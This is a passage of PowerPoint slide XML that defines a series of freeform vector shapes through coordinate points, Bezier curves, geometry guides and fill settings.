                      <a:pt x="0" y="1078"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="1106"/>
                      <a:pt x="105" y="1106"/>
                      <a:pt x="105" y="1106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="1038"/>
                      <a:pt x="116" y="977"/>
                      <a:pt x="162" y="942"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="247" y="878"/>
                      <a:pt x="392" y="927"/>
                      <a:pt x="486" y="1051"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="530" y="1108"/>
                      <a:pt x="555" y="1171"/>
                      <a:pt x="561" y="1229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="708" y="1268"/>
                      <a:pt x="708" y="1268"/>
                      <a:pt x="708" y="1268"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="708" y="673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66" name="Freeform 537"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4634" y="-1798"/>
                <a:ext cx="942" cy="1032"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 318 w 399"/>
                  <a:gd name="T1" fmla="*/ 126 h 437"/>
                  <a:gd name="T2" fmla="*/ 87 w 399"/>
                  <a:gd name="T3" fmla="*/ 27 h 437"/>
                  <a:gd name="T4" fmla="*/ 87 w 399"/>
                  <a:gd name="T5" fmla="*/ 27 h 437"/>
                  <a:gd name="T6" fmla="*/ 23 w 399"/>
                  <a:gd name="T7" fmla="*/ 43 h 437"/>
                  <a:gd name="T8" fmla="*/ 36 w 399"/>
                  <a:gd name="T9" fmla="*/ 72 h 437"/>
                  <a:gd name="T10" fmla="*/ 77 w 399"/>
                  <a:gd name="T11" fmla="*/ 309 h 437"/>
                  <a:gd name="T12" fmla="*/ 188 w 399"/>
                  <a:gd name="T13" fmla="*/ 401 h 437"/>
                  <a:gd name="T14" fmla="*/ 205 w 399"/>
                  <a:gd name="T15" fmla="*/ 437 h 437"/>
                  <a:gd name="T16" fmla="*/ 291 w 399"/>
                  <a:gd name="T17" fmla="*/ 414 h 437"/>
                  <a:gd name="T18" fmla="*/ 291 w 399"/>
                  <a:gd name="T19" fmla="*/ 414 h 437"/>
                  <a:gd name="T20" fmla="*/ 332 w 399"/>
                  <a:gd name="T21" fmla="*/ 395 h 437"/>
                  <a:gd name="T22" fmla="*/ 318 w 399"/>
                  <a:gd name="T23" fmla="*/ 126 h 4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9" h="437">
                    <a:moveTo>
                      <a:pt x="318" y="126"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="252" y="39"/>
                      <a:pt x="155" y="0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0" y="131"/>
                      <a:pt x="15" y="228"/>
                      <a:pt x="77" y="309"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="352"/>
                      <a:pt x="148" y="383"/>
                      <a:pt x="188" y="401"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="205" y="437"/>
                      <a:pt x="205" y="437"/>
                      <a:pt x="205" y="437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="291" y="414"/>
                      <a:pt x="291" y="414"/>
                      <a:pt x="291" y="414"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="291" y="414"/>
                      <a:pt x="291" y="414"/>
                      <a:pt x="291" y="414"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="306" y="410"/>
                      <a:pt x="320" y="404"/>
                      <a:pt x="332" y="395"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="399" y="344"/>
                      <a:pt x="392" y="224"/>
                      <a:pt x="318" y="126"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="11111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67" name="Freeform 538"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4426" y="-1770"/>
                <a:ext cx="952" cy="1077"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 336 w 403"/>
                  <a:gd name="T1" fmla="*/ 405 h 456"/>
                  <a:gd name="T2" fmla="*/ 81 w 403"/>
                  <a:gd name="T3" fmla="*/ 320 h 456"/>
                  <a:gd name="T4" fmla="*/ 67 w 403"/>
                  <a:gd name="T5" fmla="*/ 51 h 456"/>
                  <a:gd name="T6" fmla="*/ 322 w 403"/>
                  <a:gd name="T7" fmla="*/ 137 h 456"/>
                  <a:gd name="T8" fmla="*/ 336 w 403"/>
                  <a:gd name="T9" fmla="*/ 405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3" h="456">
                    <a:moveTo>
                      <a:pt x="336" y="405"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="270" y="456"/>
                      <a:pt x="155" y="418"/>
                      <a:pt x="81" y="320"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="222"/>
                      <a:pt x="0" y="102"/>
                      <a:pt x="67" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="0"/>
                      <a:pt x="248" y="39"/>
                      <a:pt x="322" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="397" y="234"/>
                      <a:pt x="403" y="355"/>
                      <a:pt x="336" y="405"/>
                    </a:cubicBez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68" name="Freeform 539"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4613" y="-1558"/>
                <a:ext cx="578" cy="655"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 205 w 245"/>
                  <a:gd name="T1" fmla="*/ 246 h 277"/>
                  <a:gd name="T2" fmla="*/ 49 w 245"/>
                  <a:gd name="T3" fmla="*/ 194 h 277"/>
                  <a:gd name="T4" fmla="*/ 41 w 245"/>
                  <a:gd name="T5" fmla="*/ 30 h 277"/>
                  <a:gd name="T6" fmla="*/ 196 w 245"/>
                  <a:gd name="T7" fmla="*/ 82 h 277"/>
                  <a:gd name="T8" fmla="*/ 205 w 245"/>
                  <a:gd name="T9" fmla="*/ 246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5" h="277">
                    <a:moveTo>
                      <a:pt x="205" y="246"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="277"/>
                      <a:pt x="95" y="254"/>
                      <a:pt x="49" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="134"/>
                      <a:pt x="0" y="61"/>
                      <a:pt x="41" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="0"/>
                      <a:pt x="151" y="23"/>
                      <a:pt x="196" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="241" y="142"/>
                      <a:pt x="245" y="215"/>
                      <a:pt x="205" y="2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69" name="Freeform 540"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3483" y="-4839"/>
                <a:ext cx="4073" cy="4373"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1724 w 1724"/>
                  <a:gd name="T1" fmla="*/ 463 h 1851"/>
                  <a:gd name="T2" fmla="*/ 0 w 1724"/>
                  <a:gd name="T3" fmla="*/ 0 h 1851"/>
                  <a:gd name="T4" fmla="*/ 0 w 1724"/>
                  <a:gd name="T5" fmla="*/ 1388 h 1851"/>
                  <a:gd name="T6" fmla="*/ 382 w 1724"/>
                  <a:gd name="T7" fmla="*/ 1491 h 1851"/>
                  <a:gd name="T8" fmla="*/ 439 w 1724"/>
                  <a:gd name="T9" fmla="*/ 1327 h 1851"/>
                  <a:gd name="T10" fmla="*/ 763 w 1724"/>
                  <a:gd name="T11" fmla="*/ 1436 h 1851"/>
                  <a:gd name="T12" fmla="*/ 838 w 1724"/>
                  <a:gd name="T13" fmla="*/ 1613 h 1851"/>
                  <a:gd name="T14" fmla="*/ 1724 w 1724"/>
                  <a:gd name="T15" fmla="*/ 1851 h 1851"/>
                  <a:gd name="T16" fmla="*/ 1724 w 1724"/>
                  <a:gd name="T17" fmla="*/ 463 h 18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24" h="1851">
                    <a:moveTo>
                      <a:pt x="1724" y="46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388"/>
                      <a:pt x="0" y="1388"/>
                      <a:pt x="0" y="1388"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="382" y="1491"/>
                      <a:pt x="382" y="1491"/>
                      <a:pt x="382" y="1491"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="374" y="1423"/>
                      <a:pt x="393" y="1362"/>
                      <a:pt x="439" y="1327"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="523" y="1263"/>
                      <a:pt x="668" y="1311"/>
                      <a:pt x="763" y="1436"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="806" y="1492"/>
                      <a:pt x="831" y="1555"/>
                      <a:pt x="838" y="1613"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1724" y="1851"/>
                      <a:pt x="1724" y="1851"/>
                      <a:pt x="1724" y="1851"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1724" y="463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0" name="Freeform 541"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8047" y="-3079"/>
                <a:ext cx="921" cy="1158"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 921"/>
                  <a:gd name="T1" fmla="*/ 0 h 1158"/>
                  <a:gd name="T2" fmla="*/ 534 w 921"/>
                  <a:gd name="T3" fmla="*/ 144 h 1158"/>
                  <a:gd name="T4" fmla="*/ 921 w 921"/>
                  <a:gd name="T5" fmla="*/ 1158 h 1158"/>
                  <a:gd name="T6" fmla="*/ 0 w 921"/>
                  <a:gd name="T7" fmla="*/ 921 h 1158"/>
                  <a:gd name="T8" fmla="*/ 0 w 921"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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1" h="1158">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="534" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="921" y="1158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="921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chemeClr val="hlink"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="54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1" name="Freeform 542"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8562" y="-1952"/>
                <a:ext cx="307" cy="184"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 40 w 307"/>
                  <a:gd name="T1" fmla="*/ 12 h 184"/>
                  <a:gd name="T2" fmla="*/ 307 w 307"/>
                  <a:gd name="T3" fmla="*/ 184 h 184"/>
                  <a:gd name="T4" fmla="*/ 262 w 307"/>
                  <a:gd name="T5" fmla="*/ 172 h 184"/>
                  <a:gd name="T6" fmla="*/ 0 w 307"/>
                  <a:gd name="T7" fmla="*/ 0 h 184"/>
                  <a:gd name="T8" fmla="*/ 40 w 307"/>
                  <a:gd name="T9" fmla="*/ 12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7" h="184">
                    <a:moveTo>
                      <a:pt x="40" y="12"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="307" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="12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2" name="Freeform 543"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8602" y="-1952"/>
                <a:ext cx="267" cy="184"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 267 w 267"/>
                  <a:gd name="T1" fmla="*/ 184 h 184"/>
                  <a:gd name="T2" fmla="*/ 267 w 267"/>
                  <a:gd name="T3" fmla="*/ 149 h 184"/>
                  <a:gd name="T4" fmla="*/ 43 w 267"/>
                  <a:gd name="T5" fmla="*/ 0 h 184"/>
                  <a:gd name="T6" fmla="*/ 0 w 267"/>
                  <a:gd name="T7" fmla="*/ 12 h 184"/>
                  <a:gd name="T8" fmla="*/ 267 w 267"/>
                  <a:gd name="T9" fmla="*/ 184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7" h="184">
                    <a:moveTo>
                      <a:pt x="267" y="184"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="267" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="184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3" name="Freeform 544"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8435" y="-2311"/>
                <a:ext cx="210" cy="416"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 210"/>
                  <a:gd name="T1" fmla="*/ 416 h 416"/>
                  <a:gd name="T2" fmla="*/ 0 w 210"/>
                  <a:gd name="T3" fmla="*/ 57 h 416"/>
                  <a:gd name="T4" fmla="*/ 210 w 210"/>
                  <a:gd name="T5" fmla="*/ 0 h 416"/>
                  <a:gd name="T6" fmla="*/ 210 w 210"/>
                  <a:gd name="T7" fmla="*/ 359 h 416"/>
                  <a:gd name="T8" fmla="*/ 0 w 210"/>
                  <a:gd name="T9" fmla="*/ 416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0" h="416">
                    <a:moveTo>
                      <a:pt x="0" y="416"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41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4" name="Freeform 545"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8394" y="-2264"/>
                <a:ext cx="41" cy="369"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 41 w 41"/>
                  <a:gd name="T1" fmla="*/ 10 h 369"/>
                  <a:gd name="T2" fmla="*/ 0 w 41"/>
                  <a:gd name="T3" fmla="*/ 0 h 369"/>
                  <a:gd name="T4" fmla="*/ 0 w 41"/>
                  <a:gd name="T5" fmla="*/ 357 h 369"/>
                  <a:gd name="T6" fmla="*/ 41 w 41"/>
                  <a:gd name="T7" fmla="*/ 369 h 369"/>
                  <a:gd name="T8" fmla="*/ 41 w 41"/>
                  <a:gd name="T9" fmla="*/ 10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369">
                    <a:moveTo>
                      <a:pt x="41" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="1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5" name="Freeform 546"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8394" y="-2321"/>
                <a:ext cx="251" cy="67"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 251 w 251"/>
                  <a:gd name="T1" fmla="*/ 10 h 67"/>
                  <a:gd name="T2" fmla="*/ 213 w 251"/>
                  <a:gd name="T3" fmla="*/ 0 h 67"/>
                  <a:gd name="T4" fmla="*/ 0 w 251"/>
                  <a:gd name="T5" fmla="*/ 57 h 67"/>
                  <a:gd name="T6" fmla="*/ 41 w 251"/>
                  <a:gd name="T7" fmla="*/ 67 h 67"/>
                  <a:gd name="T8" fmla="*/ 251 w 251"/>
                  <a:gd name="T9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1" h="67">
                    <a:moveTo>
                      <a:pt x="251" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="213" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="1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6" name="Freeform 547"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3604" y="-4577"/>
                <a:ext cx="319" cy="85"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 319 w 319"/>
                  <a:gd name="T1" fmla="*/ 76 h 85"/>
                  <a:gd name="T2" fmla="*/ 35 w 319"/>
                  <a:gd name="T3" fmla="*/ 0 h 85"/>
                  <a:gd name="T4" fmla="*/ 0 w 319"/>
                  <a:gd name="T5" fmla="*/ 10 h 85"/>
                  <a:gd name="T6" fmla="*/ 286 w 319"/>
                  <a:gd name="T7" fmla="*/ 85 h 85"/>
                  <a:gd name="T8" fmla="*/ 319 w 319"/>
                  <a:gd name="T9" fmla="*/ 7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9" h="85">
                    <a:moveTo>
                      <a:pt x="319" y="76"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="35" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="76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7" name="Freeform 548"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3604" y="-4567"/>
                <a:ext cx="286" cy="359"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 286 w 286"/>
                  <a:gd name="T1" fmla="*/ 359 h 359"/>
                  <a:gd name="T2" fmla="*/ 286 w 286"/>
                  <a:gd name="T3" fmla="*/ 75 h 359"/>
                  <a:gd name="T4" fmla="*/ 0 w 286"/>
                  <a:gd name="T5" fmla="*/ 0 h 359"/>
                  <a:gd name="T6" fmla="*/ 0 w 286"/>
                  <a:gd name="T7" fmla="*/ 283 h 359"/>
                  <a:gd name="T8" fmla="*/ 286 w 286"/>
                  <a:gd name="T9" fmla="*/ 359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6" h="359">
                    <a:moveTo>
                      <a:pt x="286" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="286" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="359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8" name="Freeform 549"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3890" y="-4501"/>
                <a:ext cx="33" cy="293"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 33 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 293"/>
                  <a:gd name="T2" fmla="*/ 33 w 33"/>
                  <a:gd name="T3" fmla="*/ 284 h 293"/>
                  <a:gd name="T4" fmla="*/ 0 w 33"/>
                  <a:gd name="T5" fmla="*/ 293 h 293"/>
                  <a:gd name="T6" fmla="*/ 0 w 33"/>
                  <a:gd name="T7" fmla="*/ 9 h 293"/>
                  <a:gd name="T8" fmla="*/ 33 w 33"/>
                  <a:gd name="T9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93">
                    <a:moveTo>
                      <a:pt x="33" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="33" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9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9" name="Freeform 550"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4001" y="-4470"/>
                <a:ext cx="319" cy="85"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 319 w 319"/>
                  <a:gd name="T1" fmla="*/ 78 h 85"/>
                  <a:gd name="T2" fmla="*/ 35 w 319"/>
                  <a:gd name="T3" fmla="*/ 0 h 85"/>
                  <a:gd name="T4" fmla="*/ 0 w 319"/>
                  <a:gd name="T5" fmla="*/ 9 h 85"/>
                  <a:gd name="T6" fmla="*/ 286 w 319"/>
                  <a:gd name="T7" fmla="*/ 85 h 85"/>
                  <a:gd name="T8" fmla="*/ 319 w 319"/>
                  <a:gd name="T9" fmla="*/ 78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9" h="85">
                    <a:moveTo>
                      <a:pt x="319" y="78"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="35" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="78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0" name="Freeform 551"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4001" y="-4461"/>
                <a:ext cx="286" cy="359"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 286 w 286"/>
                  <a:gd name="T1" fmla="*/ 359 h 359"/>
                  <a:gd name="T2" fmla="*/ 286 w 286"/>
                  <a:gd name="T3" fmla="*/ 76 h 359"/>
                  <a:gd name="T4" fmla="*/ 0 w 286"/>
                  <a:gd name="T5" fmla="*/ 0 h 359"/>
                  <a:gd name="T6" fmla="*/ 0 w 286"/>
                  <a:gd name="T7" fmla="*/ 284 h 359"/>
                  <a:gd name="T8" fmla="*/ 286 w 286"/>
                  <a:gd name="T9" fmla="*/ 359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6" h="359">
                    <a:moveTo>
                      <a:pt x="286" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="286" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="359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1" name="Freeform 552"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4287" y="-4392"/>
                <a:ext cx="33" cy="290"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 33 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 290"/>
                  <a:gd name="T2" fmla="*/ 33 w 33"/>
                  <a:gd name="T3" fmla="*/ 281 h 290"/>
                  <a:gd name="T4" fmla="*/ 0 w 33"/>
                  <a:gd name="T5" fmla="*/ 290 h 290"/>
                  <a:gd name="T6" fmla="*/ 0 w 33"/>
                  <a:gd name="T7" fmla="*/ 7 h 290"/>
                  <a:gd name="T8" fmla="*/ 33 w 33"/>
                  <a:gd name="T9" fmla="*/ 0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90">
                    <a:moveTo>
                      <a:pt x="33" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="33" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7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2" name="Freeform 553"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6594" y="-3788"/>
                <a:ext cx="317" cy="85"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 317 w 317"/>
                  <a:gd name="T1" fmla="*/ 78 h 85"/>
                  <a:gd name="T2" fmla="*/ 34 w 317"/>
                  <a:gd name="T3" fmla="*/ 0 h 85"/>
                  <a:gd name="T4" fmla="*/ 0 w 317"/>
                  <a:gd name="T5" fmla="*/ 10 h 85"/>
                  <a:gd name="T6" fmla="*/ 284 w 317"/>
                  <a:gd name="T7" fmla="*/ 85 h 85"/>
                  <a:gd name="T8" fmla="*/ 317 w 317"/>
                  <a:gd name="T9" fmla="*/ 78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7" h="85">
                    <a:moveTo>
                      <a:pt x="317" y="78"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="34" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="78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3" name="Freeform 554"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6594" y="-3778"/>
                <a:ext cx="284" cy="359"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 284 w 284"/>
                  <a:gd name="T1" fmla="*/ 359 h 359"/>
                  <a:gd name="T2" fmla="*/ 284 w 284"/>
                  <a:gd name="T3" fmla="*/ 75 h 359"/>
                  <a:gd name="T4" fmla="*/ 0 w 284"/>
                  <a:gd name="T5" fmla="*/ 0 h 359"/>
                  <a:gd name="T6" fmla="*/ 0 w 284"/>
                  <a:gd name="T7" fmla="*/ 283 h 359"/>
                  <a:gd name="T8" fmla="*/ 284 w 284"/>
                  <a:gd name="T9" fmla="*/ 359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4" h="359">
                    <a:moveTo>
                      <a:pt x="284" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="284" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="359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4" name="Freeform 555"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6878" y="-3710"/>
                <a:ext cx="33" cy="291"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 33 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 291"/>
                  <a:gd name="T2" fmla="*/ 33 w 33"/>
                  <a:gd name="T3" fmla="*/ 282 h 291"/>
                  <a:gd name="T4" fmla="*/ 0 w 33"/>
                  <a:gd name="T5" fmla="*/ 291 h 291"/>
                  <a:gd name="T6" fmla="*/ 0 w 33"/>
                  <a:gd name="T7" fmla="*/ 7 h 291"/>
                  <a:gd name="T8" fmla="*/ 33 w 3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91">
                    <a:moveTo>
                      <a:pt x="33" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="33" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7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5" name="Freeform 556"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6991" y="-3681"/>
                <a:ext cx="317" cy="85"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 317 w 317"/>
                  <a:gd name="T1" fmla="*/ 78 h 85"/>
                  <a:gd name="T2" fmla="*/ 33 w 317"/>
                  <a:gd name="T3" fmla="*/ 0 h 85"/>
                  <a:gd name="T4" fmla="*/ 0 w 317"/>
                  <a:gd name="T5" fmla="*/ 9 h 85"/>
